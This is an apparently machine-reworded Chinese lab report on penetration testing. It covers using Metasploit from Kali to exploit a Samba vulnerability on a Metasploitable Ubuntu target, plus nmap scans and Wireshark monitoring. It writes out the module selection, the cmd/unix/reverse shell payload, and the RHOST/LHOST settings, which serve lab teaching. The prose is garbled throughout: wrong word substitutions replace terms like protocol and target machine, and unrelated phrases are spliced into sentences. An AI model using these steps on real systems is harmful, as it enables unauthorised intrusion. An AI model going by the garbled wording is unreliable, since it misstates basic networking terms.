目录

一.知识点梳理与总结

1.目前,Linux已然成为服务器操作系统最流行的选择,虽然Linux在安全设计上较Windows等一些操作系统具有一定的先天优势linux操作系统培训,但它也决不是原先一些人所觉得的“绝对安全”。Linux操作系统也存在着大量的安全漏洞,因为它的开源特点,黑客们反倒更容易从源码中发觉更多的Linux系统内核及开源软件中的漏洞,系统管理员对Linux服务器的忙于管理也促使近些年来针对Linux系统的安全风波多有发生。

本次实践针对Linux系统存在漏洞进行远程渗透功击,使用的工具为Metasploit,据悉在进行攻守对抗过程中,还使用到了Nmap、Neusse等信息收集工具。

2.SMB(ServerMessageBlock)合同是实现不同类型计算机之间文件和复印机共享服务的合同。

SMB的工作原理就是让NetBIOS合同与SMB合同运行在TCP/IP合同之上,而且借助NetBIOS的名子解析功能让Linux计算机可以在Windows计算机之间互相访问共享文件和复印机的功能。

3.Samba是一组使linux支持SMB合同的软件,基于GPL原则发行linux内核中网络协议的设计与实现,源码完全公开。Samba的核心是两个守护进程smbd和nmbd.smbd守护进程负责构建对话linux内核中网络协议的设计与实现,验证用户提供文件和复印机共享服务等。nmbd守护进程负责实现网路浏览。

1.SMB合同2.Samba二.实验过程1.使用Metasploit进行Linux远程渗透功击

本次实验使用的功击机为Kali,IP地址为192.168.200.8;机炮为MetasploitUbuntu,IP地址为192.168.200.124:

首先在Kali上打开Metasploit:

查找要使用的漏洞对应的模块

searchsamba

对应编号是13,为此,use13即可使用该模块。

查看可用荷载showpayloads

选择功击荷载setpayloadcmd/unix/reverse

查看须要配置的参数showoptions

配置相应的参数

setRHOST192.168.200.124,setLHOST192.168.200.8

只需配置机炮IP即可

设置完成后,输入exploit进行功击

可以看见早已功击成功

2.攻守对抗实践

二人联接到同一个局域网中,功击机kali和火箭炮metasploit的IP地址分别为192.168.200.8和192.168.200.124

测试下它们的连通性

ping192.168.200.124

ping通以后

使用nmap-sV192.168.200.124扫描目标主机的开放端口与版本号等信息:

使用nmap--scriptvuln192.168.200.124扫描目标主机存在的漏洞:

功击采用的渗透模块依然是第一个实验中使用的模块,输入searchsamba

use13

此次选择第五个payloads

可以看见功击成功

逼抢方窃听:对第二次的功击进行逼抢

借助wireshark对网卡进行窃听,从中可以剖析得到,功击者IP为192.168.200.8,功击者借助的是139端口进行功击,在功击成功后进行了ifconfig等操作

三.学习中遇见的问题

问题1.在看wireshark数据包时,不晓得如何剖析出功击者是借助那个端口(服务)的漏洞进行功击的

解决:经过寻问朋友linux系统,得知从抓取数据包找最前面一个包的端口信息,对端口的理解也更深

四.学习体会

在实验中会碰到一些不理解的步骤,解决后会认为受益颇丰。从之前理解不是很到位的端口和网关,每一次亲自试错解决就会觉得收获很大。

通过本次使用Metasploit进行Linux远程渗透功击,首先进一步熟悉了Metasploit工具的使用,其次通过攻守对抗过程,动手进行了从漏洞信息收集、漏洞借助、渗透功击到获取目标主机权限的过程,提升了自己的实践能力。

本文原创地址:https://www.linuxprobe.com/kyyylxtnhjky.html编辑:刘遄,审核员:暂无